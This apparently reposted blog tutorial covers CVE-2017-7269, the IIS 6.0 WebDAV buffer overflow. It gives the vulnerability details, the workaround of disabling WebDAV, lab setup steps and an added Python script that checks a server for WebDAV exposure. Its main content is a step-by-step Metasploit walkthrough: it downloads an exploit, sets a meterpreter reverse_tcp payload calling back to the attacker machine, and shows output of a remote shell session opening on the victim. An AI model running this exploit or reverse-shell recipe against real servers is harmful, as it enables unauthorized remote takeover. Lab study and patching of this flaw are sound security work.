IIS 6.0 (CVE-2017-7269) buffer overflow

Vulnerability Description
A buffer overflow vulnerability exists in IIS 6.0 when the WebDAV service is enabled, and it can lead to remote code execution. For current IIS 6.0 users, the available workaround is to turn off the WebDAV service.

Vulnerability ID
CVE-2017-7269

Vulnerability level
High risk

Affected products
Microsoft Windows Server 2003 R2 running IIS 6.0 with the WebDAV service enabled
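
To confirm whether a server you administer still matches the affected configuration above (IIS 6.0 with WebDAV enabled), or whether the workaround has been applied, the following added example (not part of the original post) inspects the headers of an OPTIONS response. The function names are hypothetical, the sample responses are constructed, and the header sets shown are an assumption about typical server output.

```python
import http.client

WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK"}

def parse_headers(raw):
    """Parse a raw HTTP response head into {lowercase name: [values]}."""
    headers = {}
    for line in raw.replace("\r\n", "\n").split("\n")[1:]:  # skip status line
        if not line.strip():
            break  # a blank line ends the header block
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers

def assess(headers):
    """Flag IIS 6.0 that advertises WebDAV (DAV header or WebDAV-only methods)."""
    advertised = set()
    for name in ("allow", "public"):
        for value in headers.get(name, []):
            advertised.update(m.strip().upper() for m in value.split(",") if m.strip())
    dav_methods = sorted(advertised & WEBDAV_METHODS)
    webdav = bool(headers.get("dav")) or bool(dav_methods)
    iis6 = any("microsoft-iis/6.0" in s.lower() for s in headers.get("server", []))
    return {"iis6": iis6, "webdav": webdav, "dav_methods": dav_methods,
            "needs_workaround": iis6 and webdav}

def check_host(host, port=80, timeout=5.0):
    """Send one OPTIONS request to a server you administer and assess the reply."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("OPTIONS", "/")
        headers = {}
        for name, value in conn.getresponse().getheaders():
            headers.setdefault(name.lower(), []).append(value)
        return assess(headers)
    finally:
        conn.close()

# Constructed sample responses (not captured from a real server).
SAMPLE_WEBDAV_ON = ("HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/6.0\r\nDAV: 1, 2\r\n"
                    "Public: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, LOCK, UNLOCK\r\n"
                    "Allow: OPTIONS, TRACE, GET, HEAD, PROPFIND, LOCK, UNLOCK\r\n\r\n")
SAMPLE_WEBDAV_OFF = ("HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/6.0\r\n"
                     "Public: OPTIONS, TRACE, GET, HEAD, POST\r\n"
                     "Allow: OPTIONS, TRACE, GET, HEAD\r\n\r\n")

if __name__ == "__main__":
    for label, raw in (("on", SAMPLE_WEBDAV_ON), ("off", SAMPLE_WEBDAV_OFF)):
        print(label, assess(parse_headers(raw)))
```

A missing or rewritten Server banner makes `iis6` false even on IIS 6.0, so treat a `webdav` result of true on any Windows Server 2003 host as worth a manual check.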

Building the vulnerable environment
My environment is Windows 2003 R2 Enterprise Edition. After installing IIS 6.0, open the IIS manager; under Web Service Extensions there is a WebDAV option, which is prohibited by default. Right-click it and select Allow.

Then press Windows + R, run services.msc, and start the WebClient service to complete the configuration.


Vulnerability testing
Attacker machine: Kali, IP: 192.168.48.131
Victim machine: Windows 2003, IP: 192.168.48.146
Download the exploit: https://github.com/Al1ex/CVE-2017-7269
Copy the exploit into the /usr/share/metasploit-framework/modules/exploits/windows/iis directory.

msf > search cve-2017-7269

Matching Modules
================

   Name                                                 Disclosure Date  Rank    Description
   ----                                                 ---------------  ----    -----------
   exploit/windows/iis/cve-2017-7269                    2017-03-31       good    CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow
   exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Microsoft IIS WebDav ScStoragePathFromUrl Overflow


msf > use exploit/windows/iis/cve-2017-7269
msf exploit(windows/iis/cve-2017-7269) > show options

Module options (exploit/windows/iis/cve-2017-7269):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   HttpHost            localhost        yes       http host for target
   PhysicalPathLength  19               yes       length of physical path for target(include backslash)
   RHOST                                yes       The target address
   RPORT               80               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2


msf exploit(windows/iis/cve-2017-7269) > set RHOST 192.168.48.146 // set the target IP
RHOST => 192.168.48.146
msf exploit(windows/iis/cve-2017-7269) > set HttpHost 192.168.48.146 // set the target website host
HttpHost => 192.168.48.146
msf exploit(windows/iis/cve-2017-7269) > set payload windows/meterpreter/reverse_tcp // set the return payload
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/iis/cve-2017-7269) > set LHOST 192.168.48.131 // set the local IP
LHOST => 192.168.48.131
msf exploit(windows/iis/cve-2017-7269) > exploit // overflow

[*] Started reverse TCP handler on 192.168.48.131:4444
[*] Sending stage (179779 bytes) to 192.168.48.146
[*] Meterpreter session 1 opened (192.168.48.131:4444 -> 192.168.48.146:1043) at 2018-01-24 22:49:23 +0800

meterpreter >

Origin www.cnblogs.com/kuaile1314/p/11489707.html